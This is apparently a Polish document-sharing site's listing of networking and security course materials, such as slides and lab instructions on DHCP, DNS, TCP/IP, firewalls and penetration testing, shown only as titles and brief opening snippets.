Protokoły sterujące i warstwy aplikacji. Protokół kontrolny ICMP Internet Control Message Protocol Protokoły inicjowania i konfiguracji hostów Protokoły sterujące i warstwy aplikacji Protokół kontrolny ICMP Internet Control Message Protocol Protokoły inicjowania i konfiguracji hostów RARP Reverse Address REsolution Protocol BOOTP Boot Protocol

Bardziej szczegółowo

Bezpieczeństwo aplikacji internetowych

Bezpieczeństwo aplikacji internetowych Bezpieczeństwo internetowych Marek Zachara http://marek.zachara.name 1/23 Aplikacje internetowe znajdują się pod ciągłym 'ostrzałem' Jest to wynikiem skali: ponad 3 mld użytkowników sieci 900 mln 'hostnames'

Bardziej szczegółowo

Programowanie Sieciowe 1

Programowanie Sieciowe 1 Programowanie Sieciowe 1 dr inż. Tomasz Jaworski tjaworski@iis.p.lodz.pl http://tjaworski.iis.p.lodz.pl/ Cel przedmiotu Zapoznanie z mechanizmem przesyłania danych przy pomocy sieci komputerowych nawiązywaniem

Bardziej szczegółowo

Monitoring ruchu sieciowego w nk.pl w oparciu o protokół netflow oraz rozwiązania opensource

Monitoring ruchu sieciowego w nk.pl w oparciu o protokół netflow oraz rozwiązania opensource Monitoring ruchu sieciowego w nk.pl w oparciu o protokół netflow oraz rozwiązania opensource Marcin Szukała PLNOG 2013 Warszawa 01.03.2013 marcin@szukala.org Agenda Problemy czyli po co nam to? Dlaczego

Bardziej szczegółowo

Programowanie Sieciowe 2 Protokoły komunikacyjne: HTTP

Programowanie Sieciowe 2 Protokoły komunikacyjne: HTTP Programowanie Sieciowe 2 Protokoły komunikacyjne: HTTP mgr inż. Tomasz Jaworski tjaworski@kis.p.lodz.pl http://tjaworski.kis.p.lodz.pl/ Protokoły komunikacyjne HTTP HyperText Transport Protocol 2 Protokół

Bardziej szczegółowo

Protokół DHCP. DHCP Dynamic Host Configuration Protocol

Protokół DHCP. DHCP Dynamic Host Configuration Protocol Protokół DHCP Patryk Czarnik Bezpieczeństwo sieci komputerowych MSUI 2009/10 DHCP Dynamic Host Configuration Protocol Zastosowanie Pobranie przez stację w sieci lokalnej danych konfiguracyjnych z serwera

Bardziej szczegółowo

SIECI KOMPUTEROWE mgr inż. Adam Mencwal Katedra Informatyki Stosowanej

SIECI KOMPUTEROWE mgr inż. Adam Mencwal Katedra Informatyki Stosowanej SIECI KOMPUTEROWE mgr inż. Adam Mencwal Katedra Informatyki Stosowanej amencwal@kis.p.lodz.pl http://www.kis.p.lodz.pl/~amencwal/ Sieć komputerowa co to takiego? Sieć komputerowa - to grupa komputerów

Bardziej szczegółowo

Laboratorium podstaw telekomunikacji

Laboratorium podstaw telekomunikacji Laboratorium podstaw telekomunikacji Temat: Pomiar przepustowości łączy w sieciach komputerowych i podstawowe narzędzia sieciowe. Cel: Celem ćwiczenia jest przybliżenie studentom prostej metody pomiaru

Bardziej szczegółowo

Adresy w sieciach komputerowych

Adresy w sieciach komputerowych Adresy w sieciach komputerowych 1. Siedmio warstwowy model ISO-OSI (ang. Open System Interconnection Reference Model) 7. Warstwa aplikacji 6. Warstwa prezentacji 5. Warstwa sesji 4. Warstwa transportowa

Bardziej szczegółowo

Programowanie w Internecie

Programowanie w Internecie mariusz@math.uwb.edu.pl http://math.uwb.edu.pl/~mariusz Uniwersytet w Białymstoku 2018/2019 Co to jest Internet? Warunki zaliczenia Zaliczenie na podstawie opracowanej samodzielnie aplikacji WWW Zastosowane

Bardziej szczegółowo

TCP/IP. Warstwa aplikacji. mgr inż. Krzysztof Szałajko

TCP/IP. Warstwa aplikacji. mgr inż. Krzysztof Szałajko TCP/IP Warstwa aplikacji mgr inż. Krzysztof Szałajko Modele odniesienia 7 Aplikacji 6 Prezentacji 5 Sesji 4 Transportowa 3 Sieciowa 2 Łącza danych 1 Fizyczna Aplikacji Transportowa Internetowa Dostępu

Bardziej szczegółowo

Plan wykładu. Domain Name System. Hierarchiczna budowa nazw. Definicja DNS. Obszary i ich obsługa Zapytania Właściwości.

Plan wykładu. Domain Name System. Hierarchiczna budowa nazw. Definicja DNS. Obszary i ich obsługa Zapytania Właściwości. Sieci owe Sieci owe Plan wykładu Domain Name System System Nazw Domen Definicja DNS Hierarchiczna budowa nazw Obszary i ich obsługa Zapytania Właściwości Sieci owe Sieci owe Definicja DNS DNS to rozproszona

Bardziej szczegółowo

ARP Address Resolution Protocol (RFC 826)

ARP Address Resolution Protocol (RFC 826) 1 ARP Address Resolution Protocol (RFC 826) aby wysyłać dane tak po sieci lokalnej, jak i pomiędzy różnymi sieciami lokalnymi konieczny jest komplet czterech adresów: adres IP nadawcy i odbiorcy oraz adres

Bardziej szczegółowo

1. Model klient-serwer

1. Model klient-serwer 1. 1.1. Model komunikacji w sieci łącze komunikacyjne klient serwer Tradycyjny podziała zadań: Klient strona żądająca dostępu do danej usługi lub zasobu Serwer strona, która świadczy usługę lub udostępnia

Bardziej szczegółowo

Sieci komputerowe Warstwa transportowa

Sieci komputerowe Warstwa transportowa Sieci komputerowe Warstwa transportowa 2012-05-24 Sieci komputerowe Warstwa transportowa dr inż. Maciej Piechowiak 1 Wprowadzenie umożliwia jednoczesną komunikację poprzez sieć wielu aplikacjom uruchomionym

Bardziej szczegółowo

Którą normę stosuje się dla okablowania strukturalnego w sieciach komputerowych?

Którą normę stosuje się dla okablowania strukturalnego w sieciach komputerowych? Zadanie 1. Rysunek przedstawia topologię A. magistrali. B. pierścienia. C. pełnej siatki. D. rozszerzonej gwiazdy. Zadanie 2. W architekturze sieci lokalnych typu klient serwer A. żaden z komputerów nie

Bardziej szczegółowo

T: Instalacja i konfiguracja serwera DNS.

T: Instalacja i konfiguracja serwera DNS. T: Instalacja i konfiguracja serwera DNS. Podczas wykonywania poniższych zadań w zeszycie w sprawozdaniu 1. podaj i wyjaśnij polecenia, które użyjesz, aby: wyjaśnić pojęcia związane z dns, zainstalować

Bardziej szczegółowo

Obsługa incydentów bezpieczeństwa: część I, z punktu widzenia menadżera. OWASP 2010.03.17. The OWASP Foundation http://www.owasp.

Obsługa incydentów bezpieczeństwa: część I, z punktu widzenia menadżera. OWASP 2010.03.17. The OWASP Foundation http://www.owasp. Obsługa incydentów bezpieczeństwa: część I, z punktu widzenia menadżera. Przemysław Skowron OWASP Poland Leader OWASP 2010.03.17 Alior Bank S.A. przemyslaw.skowron@gmail.com Copyright The OWASP Foundation

Bardziej szczegółowo

SIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja

SIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja SIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja Instytut Telekomunikacji Wydział Elektroniki i Technik Informacyjnych Politechnika Warszawska, marzec 2015 Wprowadzenie Ćwiczenie jest wykonywane

Bardziej szczegółowo

Moduł Ethernetowy. instrukcja obsługi. Spis treści

Moduł Ethernetowy. instrukcja obsługi. Spis treści Moduł Ethernetowy instrukcja obsługi Spis treści 1. Podstawowe informacje...2 2. Konfiguracja modułu...4 3. Podłączenie do sieci RS-485 i LAN/WAN...9 4. Przywracanie ustawień fabrycznych...11 www.el-piast.com

Bardziej szczegółowo

Protokoły sieciowe - TCP/IP

Protokoły sieciowe - TCP/IP Protokoły sieciowe Protokoły sieciowe - TCP/IP TCP/IP TCP/IP (Transmission Control Protocol / Internet Protocol) działa na sprzęcie rożnych producentów może współpracować z rożnymi protokołami warstwy

Bardziej szczegółowo

Imperva Incapsula. ochrona przed atakami DDoS. Korzyści. Automatyczne przeciwdziałanie nawet największym i najsprytniejszym atakom DDoS

Imperva Incapsula. ochrona przed atakami DDoS. Korzyści. Automatyczne przeciwdziałanie nawet największym i najsprytniejszym atakom DDoS Imperva ochrona przed atakami DDoS SPECYFIKACJA PRODUKTU Automatyczne przeciwdziałanie nawet największym i najsprytniejszym atakom DDoS Korzyści Potężne wsparcie centrów danych rozproszonych po całym świecie

Bardziej szczegółowo

DNSSEC. Zbigniew Jasiński

DNSSEC. Zbigniew Jasiński DNSSEC Zbigniew Jasiński Rozwiązywanie nazw Przechowywanie i utrzymywanie danych Przegląd zagrożeń związanych z DNS modyfikacja pliku strefy nieautoryzowana dynamcizne aktualizacja dynamiczne aktualizacje

Bardziej szczegółowo

Robaki sieciowe. + systemy IDS/IPS

Robaki sieciowe. + systemy IDS/IPS Robaki sieciowe + systemy IDS/IPS Robak komputerowy (ang. computer worm) samoreplikujący się program komputerowy, podobny do wirusa komputerowego, ale w przeciwieństwie do niego nie potrzebujący nosiciela

Bardziej szczegółowo

Adresy IP v.6 IP version 4 IP version 6 byte 0 byte 1 byte 2 byte 3 byte 0 byte 1 byte 2 byte 3

Adresy IP v.6 IP version 4 IP version 6 byte 0 byte 1 byte 2 byte 3 byte 0 byte 1 byte 2 byte 3 Historia - 1/2 Historia - 2/2 1984.1 RFC 932 - propozycja subnettingu 1985.8 RFC 95 - subnetting 199.1 ostrzeżenia o wyczerpywaniu się przestrzeni adresowej 1991.12 RFC 1287 - kierunki działań 1992.5 RFC

Bardziej szczegółowo

Sieci komputerowe. Wykład dla studentów Informatyki Stosowanej i Fizyki Komputerowej UJ 2007/2008. Michał Cieśla

Sieci komputerowe. Wykład dla studentów Informatyki Stosowanej i Fizyki Komputerowej UJ 2007/2008. Michał Cieśla Sieci komputerowe Wykład dla studentów Informatyki Stosowanej i Fizyki Komputerowej UJ 2007/2008 Michał Cieśla pok. 440a, email: ciesla@if.uj.edu.pl konsultacje: wtorki 10-12 http://users.uj.edu.pl/~ciesla/

Bardziej szczegółowo

Zarządzanie bezpieczeństwem w sieciach

Zarządzanie bezpieczeństwem w sieciach Zarządzanie bezpieczeństwem w sieciach mgr inż. Rafał Jachowicz, Instytut Informatyki Stosowanej PŁ Instrukcję opracowano na podstawie materiałów mgra inż. Łukasza Jopka Router programowy z firewallem

Bardziej szczegółowo

Dlaczego? Mało adresów IPv4. Wprowadzenie ulepszeń względem IPv4 NAT CIDR

Dlaczego? Mało adresów IPv4. Wprowadzenie ulepszeń względem IPv4 NAT CIDR IPv6 Dlaczego? Mało adresów IPv4 NAT CIDR Wprowadzenie ulepszeń względem IPv4 Większa pula adresów Lepszy routing Autokonfiguracja Bezpieczeństwo Lepsza organizacja nagłówków Przywrócenie end-to-end connectivity

Bardziej szczegółowo

ZADANIE.09 Syslog, SNMP (Syslog, SNMP) 1,5h

ZADANIE.09 Syslog, SNMP (Syslog, SNMP) 1,5h Imię Nazwisko ZADANIE.09 Syslog, SNMP (Syslog, SNMP) 1,5h 1. Zbudować sieć laboratoryjną 2. Czynności wstępne 3. Syslog 4. SNMP 5. Czynności końcowe - 1 - 1. Zbudować sieć laboratoryjną Zadanie Zbudować

Bardziej szczegółowo

INSTYTUT IMMUNOLOGII I TERAPII DOŚWIADCZALNEJ im. Ludwika Hirszfelda Polska Akademia Nauk

INSTYTUT IMMUNOLOGII I TERAPII DOŚWIADCZALNEJ im. Ludwika Hirszfelda Polska Akademia Nauk INSTYTUT IMMUNOLOGII I TERAPII DOŚWIADCZALNEJ im. Ludwika Hirszfelda Polska Akademia Nauk ul. Rudolfa Weigla 12, 53-114 Wrocław tel. / fax. (4871) 37-09-997, http://www.iitd.pan.wroc.pl NIP: 896-000-56-96;

Bardziej szczegółowo

Zbieranie podstawowych śladów działalności.

Zbieranie podstawowych śladów działalności. Zwalczanie Laboratorium 4. Zbieranie podstawowych śladów działalności.. Ślady pozostawione na komputerze można podzielić na dwie kategorie: ulotne i nieulotne. Nieulotne to te, które pozostają na komputerze

Bardziej szczegółowo

pawel.rajba@gmail.com, http://itcourses.eu/ Adresy zasobów Rodzaje zawartości Negocjacja treści Komunikacja Buforowanie HTTP Request/Response Nagłówki Bezstanowość Cookies Narzędzia URL, http://www.ietf.org/rfc/rfc3986.txt

Bardziej szczegółowo

Ataki na serwery Domain Name System (DNS Cache Poisoning)

Ataki na serwery Domain Name System (DNS Cache Poisoning) Ataki na serwery Domain Name System (DNS Cache Poisoning) Jacek Gawrych semestr 9 Teleinformatyka i Zarządzanie w Telekomunikacji jgawrych@elka.pw.edu.pl Plan prezentacji Pytania Phishing -> Pharming Phishing

Bardziej szczegółowo

Najbardziej popularne metody włamań

Najbardziej popularne metody włamań Prezentacja: Najbardziej popularne metody włamań Aleksander Grygiel Plan prezentacji Skanery portów Ataki przez przepełnienie bufora Ataki z wykorzystaniem dowiązań w /tmp Ataki odmowy dostępu Skanowanie

Bardziej szczegółowo

Protokół DHCP. DHCP Dynamic Host Configuration Protocol

Protokół DHCP. DHCP Dynamic Host Configuration Protocol Protokół DHCP Patryk Czarnik Bezpieczeństwo sieci komputerowych MSUI 2010/11 DHCP Dynamic Host Configuration Protocol Zastosowanie Pobranie przez stację w sieci lokalnej danych konfiguracyjnych z serwera

Bardziej szczegółowo

SNMP, wersje 1, 2c i 3

SNMP, wersje 1, 2c i 3 SNMP, wersje 1, 2c i 3 SNMP v1 operacje zarządcy: get(oid1, OID2,..., OIDN) odczytanie wartości obiektu o zadanym identyfikatorze dla każdego argumentu getnext (OID1, OID2,..., OIDN) odczytanie identyfikatora

Bardziej szczegółowo

Architektura oraz testowanie systemu DIADEM Firewall Piotr Piotrowski

Architektura oraz testowanie systemu DIADEM Firewall Piotr Piotrowski Architektura oraz testowanie systemu DIADEM Firewall Piotr Piotrowski 1 Plan prezentacji I. Podstawowe informacje o projekcie DIADEM Firewall II. Architektura systemu III. Środowisko testowe IV. Literatura

Bardziej szczegółowo

Sieci komputerowe. Domain Name System. WIMiIP, AGH w Krakowie. dr inż. Andrzej Opaliński. www.agh.edu.pl

Sieci komputerowe. Domain Name System. WIMiIP, AGH w Krakowie. dr inż. Andrzej Opaliński. www.agh.edu.pl Sieci komputerowe Domain Name System WIMiIP, AGH w Krakowie dr inż. Andrzej Opaliński Wprowadzenie DNS Domain Name Sysytem system nazw domenowych Protokół komunikacyjny Usługa Główne zadanie: Tłumaczenie

Bardziej szczegółowo

Akademickie Centrum Informatyki PS. Wydział Informatyki PS

Akademickie Centrum Informatyki PS. Wydział Informatyki PS Akademickie Centrum Informatyki PS Wydział Informatyki PS Wydział Informatyki Sieci komputerowe i Telekomunikacyjne Datagram w Intersieci (IP) Krzysztof Bogusławski tel. 449 41 82 kbogu@man.szczecin.pl

Bardziej szczegółowo

Snifery wbudowane w Microsoft Windows

Snifery wbudowane w Microsoft Windows Snifery wbudowane w Microsoft Windows Prezentację przygotowali: Robert Milczarski Łukasz Stegliński Maciej Łaski Network Monitorw w Microsoft Windows Server 2003 Wbudowany w Windows monitor sieci wykorzystywany

Bardziej szczegółowo

Gniazda BSD implementacja w C#

Gniazda BSD implementacja w C# BSD implementacja w C# Implementacja w C#: Przestrzeń nazw: System.Net.Sockets Klasa: public class Socket : IDisposable Implementacja w C#: Konstruktor: public Socket( AddressFamily addressfamily, SocketType

Bardziej szczegółowo

RPC Remote Procedural Call. Materiały do prezentacji można znaleźć na stronie: http://www.houp.info/rpc

RPC Remote Procedural Call. Materiały do prezentacji można znaleźć na stronie: http://www.houp.info/rpc RPC Remote Procedural Call Materiały do prezentacji można znaleźć na stronie: http://www.houp.info/rpc 1 Wprowadzenie Podstawowe założenia RPC: Program uruchamiany na maszynie A może wywołać procedurę

Bardziej szczegółowo

Protokół DHCP. Patryk Czarnik. Bezpieczeństwo sieci komputerowych MSUI 2010/11. Wydział Matematyki, Informatyki i Mechaniki Uniwersytet Warszawski

Protokół DHCP. Patryk Czarnik. Bezpieczeństwo sieci komputerowych MSUI 2010/11. Wydział Matematyki, Informatyki i Mechaniki Uniwersytet Warszawski Protokół DHCP Patryk Czarnik Wydział Matematyki, Informatyki i Mechaniki Uniwersytet Warszawski Bezpieczeństwo sieci komputerowych MSUI 2010/11 Patryk Czarnik (MIMUW) 10 DHCP BSK 2010/11 1 / 18 DHCP ogólnie

Bardziej szczegółowo

Stacja czołowa COMPACT - panel OH 51

Stacja czołowa COMPACT - panel OH 51 v Instrukcja Obsługi Stacja czołowa COMPACT - panel OH 51 - jednostka kontroli zdalnej jako dodatkowy panel - zdalna kontrola do dwóch jednostek podstawowych OH50 - połączenie przez Ethernet LAN - możliwy

Bardziej szczegółowo

Uwierzytelnianie HTTP

Uwierzytelnianie HTTP Technologie Internetu Uwierzytelnianie HTTP Aleksander Denisiuk denisjuk@pja.edu.pl Polsko-Japońska Akademia Technik Komputerowych Wydział Informatyki w Gdańsku ul. Brzegi 55 80-045 Gdańsk Technologie

Bardziej szczegółowo

Sieci komputerowe. Protokoły warstwy transportowej. Wydział Inżynierii Metali i Informatyki Przemysłowej. dr inż. Andrzej Opaliński. www.agh.edu.

Sieci komputerowe. Protokoły warstwy transportowej. Wydział Inżynierii Metali i Informatyki Przemysłowej. dr inż. Andrzej Opaliński. www.agh.edu. Sieci komputerowe Protokoły warstwy transportowej Wydział Inżynierii Metali i Informatyki Przemysłowej dr inż. Andrzej Opaliński Plan wykładu Wprowadzenie opis warstwy transportowej Protokoły spoza stosu

Bardziej szczegółowo

Laboratorium nr 1 Skanowanie sieci i ataki aktywne

Laboratorium nr 1 Skanowanie sieci i ataki aktywne Laboratorium nr 1 Skanowanie sieci i ataki aktywne Laboratorium nr 1 jest poświęcone różnym technikom skanowania sieci oraz wybranym atakom aktywnym. W tym celu będziemy używać aplikacji dostępnych w systemie

Bardziej szczegółowo

Zarządzanie sesją w aplikacjach Internetowych. Kraków, 2008-10-23 Paweł Goleń

Zarządzanie sesją w aplikacjach Internetowych. Kraków, 2008-10-23 Paweł Goleń Zarządzanie sesją w aplikacjach Internetowych Kraków, 2008-10-23 Paweł Goleń Agenda Po co sesje w aplikacjach internetowych Sposoby przekazywania identyfikatorów Sposoby ochrony Cookie Analiza identyfikatora

Bardziej szczegółowo

Wykład 2: Budowanie sieci lokalnych. A. Kisiel, Budowanie sieci lokalnych

Wykład 2: Budowanie sieci lokalnych. A. Kisiel, Budowanie sieci lokalnych Wykład 2: Budowanie sieci lokalnych 1 Budowanie sieci lokalnych Technologie istotne z punktu widzenia konfiguracji i testowania poprawnego działania sieci lokalnej: Protokół ICMP i narzędzia go wykorzystujące

Bardziej szczegółowo

Sieci komputerowe Wykład dla studentów Informatyki Stosowanej studia niestacjonarne

Sieci komputerowe Wykład dla studentów Informatyki Stosowanej studia niestacjonarne Sieci komputerowe Wykład dla studentów Informatyki Stosowanej studia niestacjonarne UJ 2007/2008 Michał Cieśla pok. 440a, email: ciesla@if.uj.edu.pl http://users.uj.edu.pl/~ciesla/ 1 2 Plan wykładu 1.

Bardziej szczegółowo

Zarządzanie ruchem w sieci IP. Komunikat ICMP. Internet Control Message Protocol DSRG DSRG. DSRG Warstwa sieciowa DSRG. Protokół sterujący

Zarządzanie ruchem w sieci IP. Komunikat ICMP. Internet Control Message Protocol DSRG DSRG. DSRG Warstwa sieciowa DSRG. Protokół sterujący Zarządzanie w sieci Protokół Internet Control Message Protocol Protokół sterujący informacje o błędach np. przeznaczenie nieosiągalne, informacje sterujące np. przekierunkowanie, informacje pomocnicze

Bardziej szczegółowo

Serwer DHCP (dhcpd). Linux OpenSuse.

Serwer DHCP (dhcpd). Linux OpenSuse. 2015 Serwer DHCP (dhcpd). Linux OpenSuse. PIOTR KANIA Spis treści Wstęp.... 2 Instalacja serwera DHCP w OpenSuse.... 2 Porty komunikacyjne.... 2 Uruchomienie, restart, zatrzymanie serwera DHCP... 2 Sprawdzenie

Bardziej szczegółowo

SEGMENT TCP CZ. II. Suma kontrolna (ang. Checksum) liczona dla danych jak i nagłówka, weryfikowana po stronie odbiorczej

SEGMENT TCP CZ. II. Suma kontrolna (ang. Checksum) liczona dla danych jak i nagłówka, weryfikowana po stronie odbiorczej SEGMENT TCP CZ. I Numer portu źródłowego (ang. Source port), przeznaczenia (ang. Destination port) identyfikują aplikacje wysyłającą odbierającą dane, te dwie wielkości wraz adresami IP źródła i przeznaczenia

Bardziej szczegółowo

Warstwa sieciowa. mgr inż. Krzysztof Szałajko

Warstwa sieciowa. mgr inż. Krzysztof Szałajko Warstwa sieciowa mgr inż. Krzysztof Szałajko Modele odniesienia 7 Aplikacji 6 Prezentacji 5 Sesji 4 Transportowa 3 Sieciowa 2 Łącza danych 1 Fizyczna Aplikacji Transportowa Internetowa Dostępu do sieci

Bardziej szczegółowo

Systemy Firewall. Grzegorz Blinowski. "CC" - Open Computer Systems. Grzegorz.Blinowski@cc.com.pl

Systemy Firewall. Grzegorz Blinowski. CC - Open Computer Systems. Grzegorz.Blinowski@cc.com.pl Systemy Firewall Grzegorz Blinowski "CC" - Open Computer Systems Grzegorz.Blinowski@cc.com.pl Plan wykładu Zastosowanie systemów Firewall w Intranecie Rodzaje systemów Firewall Główne koncepcje stosowania

Bardziej szczegółowo

Testy penetracyjne Przykłady programów

Testy penetracyjne Przykłady programów Bezpieczeństwo systemów informatycznych Testy penetracyjne Przykłady programów Zbigniew Suski 1 Rekonesans - przykłady Zbigniew Suski 2 Rekonesans - przykłady Zbigniew Suski 3 Rekonesans - przykłady Zbigniew

Bardziej szczegółowo

Plan wykładu. 1. Sieć komputerowa 2. Rodzaje sieci 3. Topologie sieci 4. Karta sieciowa 5. Protokoły używane w sieciach LAN 6.

Plan wykładu. 1. Sieć komputerowa 2. Rodzaje sieci 3. Topologie sieci 4. Karta sieciowa 5. Protokoły używane w sieciach LAN 6. Plan wykładu 1. Sieć komputerowa 2. Rodzaje sieci 3. Topologie sieci 4. Karta sieciowa 5. Protokoły używane w sieciach LAN 6. Modem analogowy Sieć komputerowa Siecią komputerową nazywa się grupę komputerów

Bardziej szczegółowo